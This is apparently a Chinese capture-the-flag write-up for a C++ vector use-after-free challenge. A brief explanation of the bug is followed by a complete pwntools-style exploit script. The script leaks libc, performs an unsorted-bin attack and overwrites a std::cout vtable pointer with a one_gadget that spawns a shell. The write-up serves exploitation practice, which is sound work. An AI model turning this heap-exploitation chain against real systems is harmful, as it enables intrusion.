vector的特性扩容特性,1,2,4,8,16......个元素,每次超过阈值,就会将之前的堆块释放,并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90......
vector的内存分布为
first | cur | last
这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容,就会将之前的chunk释放,但是begin全局变量还是指向原来的堆块,形成UAF漏洞。
利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget
#-*- coding:utf-8 -*-
from PwnContext import *
context.terminal = ['tmux','splitw','-h']
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
leak_libc=lambda data=0 :uu64(ru('\x7f',drop=False)[-6:])-data
debugg = 1
logg = 0
ctx.binary = './pwn1'
ctx.breakpoints=[0x40121E]
ctx.symbols={'lst':0x605380}
if debugg:
rs()
else:
ctx.remote = ('0.0.0.0', 23339)
rs('remote')
#ctx.start("gdb",gdbscript="set follow-fork-mode child\nc")
if logg:
context.log_level='debug'
def lg(s,d):
success(str(s)+' = '+hex(d))
def cmd(idx):
sla('>>',idx)
def add(c):
cmd(1)
sla('num:',c)
def free():
cmd(3)
def show():
cmd(2)
#leak libc_base
for i in range(0x10):
add(i)
show()
ru('1:')
libc_base = int(ru('\n'))-0x3c4b78
lg('libc_base',libc_base)
for i in range(34):
sla('(y/n):','n')
free()#clear
one = 0x4526a+libc_base
lg('one',one)
#avoid consolidate 将top_chunk往下移
for i in range(0x21):
add(str(one))
free()#clear
#unsortedbin attack
for i in range(0x10):
add(str(0x21))
show()
sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x6051E8))
for i in range(15):
sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x41))#change size to avoid unlink
for i in range(16):#rest
sla('(y/n):','n')
free()#clear
#dbg()
for i in range(9):
add(i)
irt()
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''